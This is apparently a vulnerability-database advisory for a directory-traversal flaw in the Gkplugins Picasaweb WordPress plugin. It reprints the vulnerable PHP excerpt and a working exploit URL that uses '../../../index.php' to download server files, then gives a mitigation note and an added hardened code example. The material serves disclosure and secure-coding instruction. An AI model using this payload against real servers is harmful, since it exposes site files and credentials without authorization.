Vendor: Gkplugins Picasaweb
By: TMT [VNhgroup]
CVSS: 8.8 (HIGH)
CWE: 22 (Directory Traversal)
Product Name: Gkplugins Picasaweb
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2015

Gkplugins Picasaweb Download File

The vulnerability exists due to insufficient validation of user-supplied input in the 'f' and 'l' parameters of '/plugins/gkplugins_picasaweb/plugins/plugins_player.php' script. A remote attacker can download arbitrary files from the vulnerable server by sending a specially crafted HTTP request.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized.

Exploit-DB raw data:

# Exploit Title: Gkplugins Picasaweb Download File
# Date : 2015-08-13
# Exploit Author : TMT [VNhgroup]
# Vendor Homepage: https://gkplugins.com/
# Tested on: Windows 7

File
------------------------
$fileout = $_GET['f']; // <-- you can download a file
$filelength = $_GET['l'];
$filestream = $_GET['start'];
if($fileout!=""){
	$fileout = urldecode($fileout);
	$filelength = urldecode($filelength);
	if($filestream!=""){
		$filelength -= $filestream;
		$filestream = "?start=".$filestream;
	}
	header('Content-Type: application/octet-stream');
	header('Content-Length: ' . $filelength);
	readfile($fileout.$filestream);
}else{
	$text = get_curl($link); 
	echo $text;
}

------------------------------
Exploit Code:
site.com/plugins/gkplugins_picasaweb/plugins/plugins_player.php?f=../../../index.php
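
A hardened version of the `plugins_player.php` excerpt above, added here to illustrate the input validation the mitigation calls for; it is not the vendor's code or a published patch. It assumes the script is only meant to proxy remote media over HTTP(S); `ALLOWED_HOSTS`, `media.example.com` and `validate_remote_source()` are hypothetical names.

```php
<?php
// Added example, not the vendor's code. ALLOWED_HOSTS is a hypothetical
// allow-list: set it to the media hosts the player is meant to proxy.
const ALLOWED_HOSTS = ['media.example.com'];

// Return a rebuilt http(s) URL on an allowed host, or null for anything else.
function validate_remote_source($raw): ?string
{
    if (!is_string($raw) || $raw === '' || preg_match('/[\x00-\x20\x7f]/', $raw)) {
        return null;                    // missing, an array (f[]=x), or control bytes
    }
    $p = parse_url($raw);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return null;                    // local or relative path, e.g. ../../../index.php
    }
    $scheme = strtolower($p['scheme']);
    $host   = strtolower($p['host']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;                    // file://, php://, ftp:// and other wrappers
    }
    if (isset($p['user']) || isset($p['pass']) || isset($p['port'])) {
        return null;                    // no credentials or alternate ports
    }
    if (!in_array($host, ALLOWED_HOSTS, true)) {
        return null;                    // keeps the script from fetching arbitrary hosts
    }
    return $scheme . '://' . $host . ($p['path'] ?? '/')
         . (isset($p['query']) ? '?' . $p['query'] : '');
}

// $_GET values are already URL-decoded by PHP, so no urldecode() here.
$url   = validate_remote_source($_GET['f'] ?? '');
$start = $_GET['start'] ?? '';
if ($url === null || ($start !== '' && !(is_string($start) && ctype_digit($start)))) {
    http_response_code(400);
    exit('Bad request');
}
if ($start !== '') {
    $url .= (strpos($url, '?') === false ? '?' : '&') . 'start=' . $start;
}
// Do not follow redirects away from the validated host.
$ctx = stream_context_create(['http' => ['follow_location' => 0]]);
header('Content-Type: application/octet-stream');
// Content-Length is left unset instead of being echoed from the 'l' parameter.
readfile($url, false, $ctx);
```

Because `f` must now parse as an absolute `http`/`https` URL on an allow-listed host, relative paths and local stream wrappers never reach `readfile()`.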